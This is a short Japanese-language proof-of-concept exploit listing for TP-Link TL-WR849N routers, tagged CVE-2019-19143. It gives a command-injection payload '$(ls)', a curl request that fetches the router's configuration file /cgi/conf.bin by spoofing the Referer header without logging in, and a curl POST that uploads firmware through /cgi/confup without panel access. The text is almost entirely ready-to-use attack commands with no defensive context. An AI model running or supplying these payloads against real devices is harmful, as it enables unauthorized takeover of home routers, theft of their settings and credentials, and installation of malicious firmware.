
TP-Linkルーター向けの概念実証(PoC)エクスプロイト。リモートコマンド実行および認証バイパスの脆弱性を含む。
ペイロード: "$(ls)"
TP LINK TL-WR849N - リモートコマンド実行 PoC
ペイロード:
curl -X GET -H "Referer: http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin
パネルにアクセスせずに新しいファームウェアをアップロードする
[CVE-2019-19143] ファームウェア更新: パネルにアクセスせずに新しいファームウェアをアップロードする
ペイロード:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer: http://192.168.0.2/mainFrame.htm" -F [email protected] http://192.168.0.2/cgi/confup